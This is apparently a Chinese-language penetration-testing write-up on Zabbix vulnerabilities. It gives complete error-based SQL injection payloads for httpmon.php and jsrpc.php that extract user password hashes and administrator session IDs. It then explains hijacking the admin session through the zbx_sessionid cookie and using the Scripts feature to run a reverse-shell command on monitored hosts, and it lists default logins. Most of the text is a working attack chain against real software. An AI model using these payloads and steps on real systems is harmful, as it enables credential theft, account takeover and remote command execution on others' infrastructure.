Zabbix漏洞总结

SQL注入(一)

影响版本
1.8.5-1.8.9
利用前提
需要登录,默认口令 admin/zabbix或者是guest/空

使用Guest账户登录

报错注入

httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

可以获取到加密后密码
zabbix的session是存储在zabbix.sessions表中的

mysql> select sessionid from zabbix.sessions where status=0 and userid=1 limit 0,1;
+----------------------------------+
| sessionid                        |
+----------------------------------+
| 0207b91351782e881d98cdbb1074b5bb |
+----------------------------------+
1 row in set (0.00 sec)

通过注入获取到zabbix.sessions中保存着用户的session信息

httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid=1 LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

可以获取到session

session:00afc31ea35f3f156ebb5c4b3b119be3

然后进行Cookie欺骗 直接替换zbx_sessionid为这个00afc31ea35f3f156ebb5c4b3b119be3
成功以administrator登陆

Administrator–>Scripts Create script 添加command为反弹命令

然后去找触发点,例如在Monitoring–>Triggers或者Monitoring–>Events都可以,过滤的时候把条件设置的宽松一些,能够筛选出尽量多的主机。然后来到这里 可以执行刚才设置的指令

这里命令执行成功的前提是zabbix客户端zabbix_agentd.conf配置

EnableRemoteCommands=1

获取到的权限是zabbix agent的运行权限。

SQL注入(二)


影响版本
2.2.x, 3.0.0-3.0.3
漏洞前提
需要登录,默认口令 admin/zabbix或者是guest/空
漏洞URL

http://*.*.*.*/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(sessionid%20as%20char),0x7e))%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

报错如下:
得到session为0000cfd165072547509ff0b7fef9ed96,修改使用Firefox下插件Cookies Manager+修改zbx_sessionid为该值,就能以管理员权限登录。